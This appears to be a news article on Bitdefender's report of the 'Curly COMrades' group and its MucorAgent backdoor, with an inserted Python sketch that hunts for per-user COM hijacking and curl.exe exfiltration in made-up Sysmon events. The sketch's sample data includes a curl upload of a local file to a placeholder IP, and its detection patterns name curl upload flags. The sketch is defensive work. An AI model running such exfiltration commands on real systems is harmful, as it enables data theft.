- Bitdefender finds a new piece of malware in the wild
- Attributes it to a new, previously unknown threat group
- Researchers believe the group is Russian
Cybersecurity researchers at Bitdefender recently observed a new threat actor using a previously unseen backdoor to target critical infrastructure organizations in Eastern Europe.
Bitdefender named the group Curly COMrades, because it relies heavily on the curl.exe tool to exfiltrate data and communicate with its command-and-control (C2) server, and because it hijacks Component Object Model (COM) objects during its attacks.
In their attacks, Curly COMrades deploy a backdoor called MucorAgent, a custom three-stage malware component "designed as a stealthy .NET tool capable of running an AES-encrypted PowerShell script and uploading the resulting output to a designated server."
When in doubt, blame the Russians
In other words, it is a piece of Windows malware that executes hidden commands, keeps them encrypted on disk to evade detection (the PowerShell is decrypted only when it runs, so file-based scanning sees ciphertext rather than the script), and sends the results back to the attacker.
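The two tradecraft elements named above, a per-user COM server registration and curl.exe used to ship data out, are both visible in ordinary endpoint telemetry. As an added example (not code from the page, from Bitdefender, or from the malware), the following Python sketch applies two hunting heuristics to constructed Sysmon-style events. COM hijacking works because per-user registrations under HKCU\Software\Classes are consulted before the machine-wide HKLM entry, so the detector looks for COM server keys written in a user hive, and rates them higher when the DLL lives in a user-writable directory. The curl rule flags uploads, raw-IP destinations and script-host parents. The event records, the CLSID, the SID, the paths and the IP are all made up for the example.

```python
"""Hunting heuristics for per-user COM hijacking and curl.exe exfiltration.
The events below are constructed to resemble Sysmon fields; they are not real
telemetry. Sysmon event 13 = registry value set, event 1 = process creation."""
import re
from pathlib import PureWindowsPath

# A COM server path being registered under any CLSID.
COM_SERVER_KEY = re.compile(
    r"\\Classes\\CLSID\\\{[0-9A-Fa-f-]{36}\}\\(InprocServer32|LocalServer32)",
    re.IGNORECASE,
)
# Per-user hives as Sysmon records them (HKU\<user SID>\...); HKCU kept for other sources.
USER_HIVE = re.compile(r"^(HKCU|HKU\\S-1-5-21-[0-9-]+)\\", re.IGNORECASE)
# Locations a standard user can write to; a COM server DLL there is a strong signal.
USER_WRITABLE = re.compile(r"^[A-Za-z]:\\(Users|ProgramData|Windows\\Temp)\\", re.IGNORECASE)
# curl switches that send a local file or body to the server (case-sensitive: -F is not -f).
UPLOAD_FLAGS = re.compile(r"(^|\s)(-F|-T|-d|--data|--data-binary|--upload-file)(\s|=)")
RAW_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?:[:/]|$)", re.IGNORECASE)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed sample events (hypothetical CLSID, SID, paths and IP).
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Classes"
                     r"\CLSID\{DEADBEEF-0000-0000-0000-000000000001}\InprocServer32\(Default)",
     "Details": r"C:\Users\Public\Libraries\loader.dll"},
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"curl.exe -s -F file=@C:\Users\Public\out.bin http://203.0.113.10/upload"},
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"curl.exe -sSL https://example.org/release.zip -o release.zip"},
    {"EventID": 13, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\SOFTWARE\Classes\CLSID\{DEADBEEF-0000-0000-0000-000000000002}"
                     r"\InprocServer32\(Default)",
     "Details": r"C:\Program Files\Vendor\vendor.dll"},
]


def detect_com_hijack(event):
    """Flag a COM server registered in a per-user hive, the pattern COM hijacking relies on."""
    if event.get("EventID") != 13:
        return None
    target = event.get("TargetObject", "")
    if not COM_SERVER_KEY.search(target) or not USER_HIVE.match(target):
        return None  # machine-wide (HKLM) registrations are ordinary installs
    server = event.get("Details", "")
    severity = "high" if USER_WRITABLE.match(server) else "medium"
    return {"rule": "com_hijack_user_hive", "severity": severity, "server": server}


def detect_curl_exfil(event):
    """Flag curl.exe launches that look like uploads or scripted C2 traffic."""
    if event.get("EventID") != 1:
        return None
    if PureWindowsPath(event.get("Image", "")).name.lower() != "curl.exe":
        return None
    cmd = event.get("CommandLine", "")
    reasons = []
    if UPLOAD_FLAGS.search(cmd):
        reasons.append("upload flag")
    if RAW_IP_URL.search(cmd):
        reasons.append("raw-IP destination")
    if PureWindowsPath(event.get("ParentImage", "")).name.lower() in SCRIPT_HOSTS:
        reasons.append("script-host parent")
    if not reasons:
        return None
    severity = "high" if len(reasons) > 1 else "low"
    return {"rule": "curl_exfil", "severity": severity, "reasons": reasons}


def scan(events):
    """Run both detectors over a list of events and return (index, finding) pairs."""
    findings = []
    for i, ev in enumerate(events):
        for detector in (detect_com_hijack, detect_curl_exfil):
            hit = detector(ev)
            if hit:
                findings.append((i, hit))
    return findings


if __name__ == "__main__":
    for index, finding in scan(SAMPLE_EVENTS):
        print(index, finding)
```

Two caveats when turning this into a production rule: elevated (high-integrity) processes ignore per-user COM registrations, so the registry rule catches user-level persistence rather than SYSTEM-level, and curl.exe ships with Windows 10 and later, so the process rule needs the upload, destination or parent qualifiers to avoid drowning in legitimate downloads.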
So far, identified victims include government and judicial organizations in Georgia and energy companies in Moldova.
Given the targets, the researchers believe the attackers are of Russian origin, or at least Russia-aligned.
However, they emphasized that there are no strong overlaps with known Russian APT groups, although Curly COMrades' operations "are aligned with the geopolitical objectives of the Russian Federation."
Bitdefender could not determine the initial access vector, that is, how the attackers first got onto the target endpoints to deploy MucorAgent.
They claim to have seen installations of multiple proxy tools, including some that, they suspect, may have been used for that purpose.
Since Russia's attention turned to Ukraine in 2014 with the annexation of Crimea, the other countries along its borders have dropped out of the spotlight. Georgia, however, is in a position similar to Ukraine's, with two regions that have declared independence with the help of the Russian military: South Ossetia and Abkhazia. It would therefore make sense for Russia's cyber operators to want to monitor neighboring countries and their diplomatic efforts.
Via BleepingComputer